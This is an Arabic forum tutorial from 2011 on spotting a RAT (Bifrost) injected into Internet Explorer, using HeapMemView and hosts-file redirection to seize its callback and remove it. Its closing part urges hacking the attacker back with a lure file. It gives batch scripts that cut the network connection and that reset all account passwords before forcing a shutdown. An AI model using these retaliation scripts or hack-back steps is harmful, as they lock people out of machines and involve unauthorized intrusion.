الجنس : عدد المساهمات : 99تاريخ التسجيل : 23/03/2011العمر : 28المزاج : راااايق
موضوع: تحدي الهاكرز الــــــــد1ـــــرس الأحد أبريل 17, 2011 10:47 pm
الحمد لله ما غرد بلبل وصدح، وما اهتدى قلب وانشرح ، وما عم فينا سرور وفرح،
الحمد لله ما ارتفع نور الحق وظهر، وما تراجع الباطل وتقهقر،
وما سال نبع ماء وتفجر ، وما طلع صبح وأسفر ، وصلاة
وسلاماًَ طيبين مباركين على النبي المطهر صاحب الوجه الأنور،
والجبين الأزهر ، ما سار سفين للحق وأبحر ، وما على نجم في السماء وأبهر ،
وعلى آله وصحبه خير أهل ومعشر، صلاة وسلاماًَ إلى يوم البعث و المحشر
الصلاة و السلام على اشرف المرسلين
مرحبا بكم في منتدى القسم الرياضي
سنكشف التلغيم (حقن) بأقوى الأدوات وبطريقة يدوية دون اللجوء الى الإتصال بالنت الدرس سهل جدا وقوي أرجو التركيز: سنستعمل أداتين بسيطتين لاتحتاجان للتنصيب اسم الأداة التس سنعمل عليها: HeapMemView الأداة تستخرج هوستات لكل برامج الإختراق ومايعجبني في الأداة أنك تستطيع استخراج الهوست من الملف المحقون دون اتصال
لأن الأداة لا تعتمد على الإتصالات الخارجية بل تستخرج بيانات الملف الملغوم دون اتصال بالنت ويعني انك ستأخذ كامل راحتك لأن الهاكر لا يستطيع اختراقك إلا اذا قمت بالإتصال بالنت طيب مفهوم فيه واحد موش فاهم اوكي خذ هذه طيب من لم يفهم بعد كلشي تمام ok let's bigin : لقد قلنا في البداية أن البرنامج يعمل على الملفات المحقونة رح تقولي ماهو الحقن
الحقن: بصفة عامة مثلا أنا حقنت الخادم (تروجان او سيرفر أو باتش أو ...الخ) ببرنامج معين مثلا msn يعني أنه عندما يشتغل السيرفر في حاسوبك سيشتغل على شكل برنامج msn أو أي برنامج تم الحقن فيه رغم أننا لم نفتح ال msn سنجده مفتوح على الدوام في قامة البروسيس وحتى اذا حاولت قتل البروسيس يبقى متجدد حتى يتم حذف السيرفر وغالبا مايتم الحقن في متصفح internet explorer كبرنامج بيفروست يقوم بالحقن أتوماتيكيا في المتصفح iexplore.exe
أولا لازم نجمد النظام تفاديا لأي طارء يمكنك استعمال deep freeze
لا تخاف راح اشرحلك لماذا : لأن السيرفر في بعض الأحيان يبرمجه الهاكر بأن يبدأ بتقديم حزمة من المعلومات بعد مدة معينة من الوقت يختارها هو وهذا لتظليلنا لأنه اذا كان الملف الملغوم يحتوي سيرفر مبرمج ليتصل بالهاكر بعد نصف ساعة مثلا من فتح الملف كيف سنتعرف على هويته ان شاء الله مفهوم
ثم ندعس على البرنامج المشبوه والملغم لكن قبل ذلك لازم نغلق جميع البرامج الغير ضرورية لكي نكتشف البرنامج المحقون فيه العملية وعادة مايكون المتصفح internet explorer شوف الصورة ماإن ندعس على البرنامج حتى يظهر المتصفح بالرغم من أننا لم نفتحه :
الأن ننتقل الى المرحلة التالية وهي مرحلة مهمة سنجعل التبليغ يصل الينا لا الى الهاكر xD الخطوة الأولى سنذهب الى هذا المسار
C:\WINDOWS\system32\drivers\etc
ونفتح ملف hosts ب blook notes ثم نكتب ال no-ip مكان الأيبي الإفتراضي 127.0.0.1 ونفتح برنامج بيفروست يمكنك تحميله من google سنلاحظ أن التبليغ وصل (جاري رفع الصور للشرح كيفية حذف السيرفر وبالمناسبة لاتوجد طريقة أخرى لحذفه إلا عن طريق البرنامج الذي صُنع به )
سأفسر لماذا وصل التبليغ لنا وليس للهاكر: نحن نعلم أن السرفر مزود بعميل ينقل التبليغ الى جهاز المخترق .
ونحن غيرنا العميل وجعلنا التبليغ يأتي على جهازنا عن طريق الهوست
والان نتأكد من أننا حذفنا السرفر من الجهاز .
نفتح البيفروست لا وجود للتبليغ .
وهناك حل أخر وهو : أننا نتصل بصاحب شركة no-ip عن طريق الإيمايل واخباره بأن الهوست الذي كشفناه يستعمل للإختراق فيتم إيقافه لكن هذه الطريقة ليست فعالة يعني ممكن لا تتم الإستجابة إلا بعد أسبوع :
الرسالة this host name is use for hacking وتكتب no-ip الذي وجدته لكن هذه الطريقة لا تعجبني لأنه ممكن يكون حساب الهوست عن طريق موقع dyns و zypt لتثبيت الأيبي لذلك أعتبره حل غير حتمي وهنا طريقة أخرى وهي أنك ستخترق الملغم وذلك بفتحك للسيرفر و لا تقطع الإتصال و ستضع باتش خاص بك تسميه (جميع كلمات الأسرار للإيمايلات) مثلا لما يراه الهاكر أكيد راح يحمله شو ويفتحو فيتم اختراقه ثم نذهب الى مقهى الأنترنت ونغلق حاسوبه بكلمة سر مثلا : شو رايك بتعطيل اتصاله على النت xD
PHP: @echo off ipconfig /release if ERRORLEVEL1 ipconfig /release_all
شو رايك بغلق حاسوبه بكلمة سر من اختيارك
@echo off break off net user %USERNAME% 0000 net user administrator 0000 net user Guest 0000 shutdown -s -f -t 00 exit
مكان 0000 ضع كلمة سر من اختيارك lool
ملاحظة: تكتب الكود في bloock note ثم تحفظة بصيغة bat مثلا mot de pass.bat
الى اللقاء في درس أخر من طرق كشف التلغيم بواسطة برامج
